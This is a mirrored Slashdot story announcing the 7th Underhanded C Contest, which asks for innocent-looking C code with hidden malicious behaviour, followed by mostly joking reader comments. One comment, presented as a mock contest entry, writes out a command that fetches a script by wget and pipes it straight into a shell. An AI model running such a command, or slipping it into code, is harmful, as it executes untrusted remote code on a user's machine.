Slashdot Mirror

← Back to Stories (view on slashdot.org)

The 7th Underhanded C Contest Is Online

Posted by samzenpus on from the back-again dept.

Xcott Craver writes The 7th Underhanded C Contest is now open. The goal of the contest is to write code that is as readable, clear, innocent and straightforward as possible, and yet somehow exhibits evil behavior that cannot be seen even when staring at the source code. The winners from 2013 are also online, and their clever and insightful submissions make for fun reading.

15 of 41 comments (clear)

  1. New twist this time by Anonymous Coward · · Score: 5, Funny

    Previously the contest has been about doing nefarious stuff to the user of the program while keeping the code innocuous.
    This time, they want you to clandestinely warn users of government spying. It's a complete about-face on the definition of "underhanded". I love it.

    1. Re:New twist this time by Wonko+the+Sane · · Score: 3, Funny

      This NSA recruiting program has to become more subtle in order to attract participants.

    2. Re:New twist this time by Anonymous Coward · · Score: 3, Informative

      If you read the whole thing you'd notice that you're playing the role of an NSA insider who's leaking information... I thought you people liked that sort of thing?

    3. Re:New twist this time by alvinrod · · Score: 4, Insightful

      Or it gives some insiders who might want to do such a thing a few ideas of how to go about it while maintaining plausible deniability.

  2. Re:The previous entry page leads to 404 by Xcott+Craver · · Score: 4, Funny

    That's not a defunct link to previous entries, but a defunct link to a previous version of the contest site. I've un-defuncteded it to more recent previous version of the contest site, but soon that will also be defunctitated or defunctified, or defunctored.

    You can see the previous entries by scrolling down, or by selecting "past years" from the menu bar on the web page.

  3. Re:The previous entry page leads to 404 by gstoddart · · Score: 4, Funny

    I've un-defuncteded it to more recent previous version of the contest site, but soon that will also be defunctitated or defunctified, or defunctored.

    What defunct are you talking about? ;-)

    --
    Lost at C:>. Found at C.
  4. Re:The previous entry page leads to 404 by oodaloop · · Score: 4, Funny

    I've un-defuncteded

    So it's totally funct now?

    --
    Tic-Tac-Toe, Global Thermonuclear War, and relationships all have the same winning move.
  5. Not so clever by Anonymous Coward · · Score: 3, Informative

    Don't get me wrong this is all great fun yet many of these schemes stand no chance of being committed in any serious project.

    Implicit returns generate compiler warnings.

    printf variable as format specifier is a well known security issue lazy eyeballs and static analysis tools check for.

    Serialization delimiter games are also well known issues standing little chance of being accepted.

    1. Re:Not so clever by BlackPignouf · · Score: 3, Funny

      Yeah right.
      Something like this http://www.gergely.risko.hu/de... would never get committed.

  6. Not so clever by slashdice · · Score: 4, Insightful

    were that true, CVE wouldn't be a thing.

    --
    Copyright (c) 1990 - 2014 Dice. All rights reserved. Use of this comment is subject to certain Terms and Conditions.
  7. OpenSSL by Anonymous Coward · · Score: 5, Funny

    Sorry guys but this year's winner hands down is OpenSSL.

    1. Re:OpenSSL by swillden · · Score: 4, Funny

      Sorry guys but this year's winner hands down is OpenSSL.

      No, underhanded C submissions have to be readable, clear and straightforward. OpenSSL is none of those.

      --
      Note to ACs: I usually delete AC replies without reading them. If you want to talk to me, log in.
  8. Re:My entry by weilawei · · Score: 2

    For best results, use FTP! Comes with free side effects.*

    exec("wget -O- ftp: //127.0.0.1/cute-puppies-and-unicorns-trust-me | sh");

    (*FTP offer is nontransferable and must be presented at time of online download or Promo Code must be entered at 127.0.0.1 to receive discount. Underhanded discounts applied prior to percent-off total download discounts. Offer cannot be used in conjunction with any other percent-off discounts, including version-specific discounts. Offer not valid on the following merchandise: OpenBSD CD purchases; wget Cares® cause merchandise or other charitable items; prestige brands of operating systems, hardware and select prestige brands of headphones; select electronics/electrics and select Windows merchandise. For a complete list of these merchandise exclusions, click here or look for signs in our stores. Offer also not valid on byte adjustments on prior downloads; payment on a wget’s Charge account; taxes, shipping and/or handling fees. Subject to credit approval. See store for details.

  9. Do what Amarok 1.4 does to MP3 tags. by throwawayUnderhanded · · Score: 2

    In Amarok 1.4, when you change the tags in an MP3 file, they are not actually ASCII, they are some kind of UTF-8 reencode that looks exactly like ASCII in Amarok and get printed correctly on a terminal. But when the files are transferred and displayed on some MP3 players they appear as "mojibake".

  10. Re:The previous entry page leads to 404 by DRJlaw · · Score: 2

    What defunct are you talking about? ;-)

    We want the funct!
    Give up the funct!
    We need the funct!
    We gotta have that funct!

    Owww! Stop the hitting...